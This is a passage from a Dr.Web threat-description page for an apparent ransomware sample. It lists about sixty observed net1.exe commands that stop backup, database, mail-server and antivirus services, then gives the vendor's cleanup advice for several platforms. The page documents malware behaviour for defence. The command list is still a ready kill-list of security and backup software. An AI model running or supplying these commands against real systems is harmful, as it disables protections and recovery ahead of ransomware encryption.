  • '<SYSTEM32>\net1.exe' stop “aphidmonitorservice” /y
  • '<SYSTEM32>\net1.exe' stop msftesql$PROD /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeMGMT /y
  • '<SYSTEM32>\net1.exe' stop kavfsslp /y
  • '<SYSTEM32>\net1.exe' stop VeeamBrokerSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SQL_2008 /y
  • '<SYSTEM32>\net1.exe' stop klnagent /y
  • '<SYSTEM32>\net1.exe' stop VeeamCatalogSvc /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$VEEAMSQL2008R2 /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  • '<SYSTEM32>\net1.exe' stop KAVFS /y
  • '<SYSTEM32>\net1.exe' stop BMR Boot Service /y
  • '<SYSTEM32>\net1.exe' stop ESHASRV /y
  • '<SYSTEM32>\net1.exe' stop SDRSVC /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$VEEAMSQL2012 /y
  • '<SYSTEM32>\net1.exe' stop FA_Scheduler /y
  • '<SYSTEM32>\net1.exe' stop MSOLAP$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop vapiendpoint /y
  • '<SYSTEM32>\net1.exe' stop tmlisten /y
  • '<SYSTEM32>\net1.exe' stop SQLSafeOLRService /y
  • '<SYSTEM32>\net1.exe' stop TrueKey /y
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT /y
  • '<SYSTEM32>\net1.exe' stop TrueKeyScheduler /y
  • '<SYSTEM32>\net1.exe' stop SQLTELEMETRY /y
  • '<SYSTEM32>\net1.exe' stop TrueKeyServiceHelper /y
  • '<SYSTEM32>\net1.exe' stop SQLTELEMETRY$ECWDB2 /y
  • '<SYSTEM32>\net1.exe' stop WRSVC /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer110 /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SHAREPOINT /y
  • '<SYSTEM32>\net1.exe' stop POP3Svc /y
  • '<SYSTEM32>\net1.exe' stop VeeamBackupSvc /y
  • '<SYSTEM32>\net1.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net1.exe' stop “Sophos Clean Service” /y
  • '<SYSTEM32>\net1.exe' stop SMTPSvc /y
  • '<SYSTEM32>\net1.exe' stop “SQLsafe Backup Service” /y
  • '<SYSTEM32>\net1.exe' stop ReportServer /y
  • '<SYSTEM32>\net1.exe' stop SamSs /y
  • '<SYSTEM32>\net1.exe' stop MsDtsServer100 /y
  • '<SYSTEM32>\net1.exe' stop NetMsmqActivator /y
  • '<SYSTEM32>\net1.exe' stop MSExchangeIS /y
  • '<SYSTEM32>\net1.exe' stop “Sophos AutoUpdate Service” /y
  • '<SYSTEM32>\net1.exe' stop McAfeeEngineService /y
  • '<SYSTEM32>\net1.exe' stop “SQL Backups /y
  • '<SYSTEM32>\net1.exe' stop MBAMService /y
  • '<SYSTEM32>\net1.exe' stop VeeamDeploySvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLSERVER /y
  • '<SYSTEM32>\net1.exe' stop MBEndpointAgent /y
  • '<SYSTEM32>\net1.exe' stop VeeamEnterpriseManagerSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLServerADHelper /y
  • '<SYSTEM32>\net1.exe' stop masvc /y
  • '<SYSTEM32>\net1.exe' stop VeeamDeploymentService /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$TPSAMA /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$SYSTEM_BGC /y
  • '<SYSTEM32>\net1.exe' stop macmnsvc /y
  • '<SYSTEM32>\net1.exe' stop VeeamCloudSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQLFDLauncher$TPS /y
  • '<SYSTEM32>\net1.exe' stop SQLWriter /y
  • '<SYSTEM32>\net1.exe' stop KAVFSGT /y
  • '<SYSTEM32>\net1.exe' stop stc_raw_agent /y

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Dr.Web © Doctor Web
2003 — 2022

Doctor Web is a Russian cybersecurity company focused on threat detection, prevention and response technologies.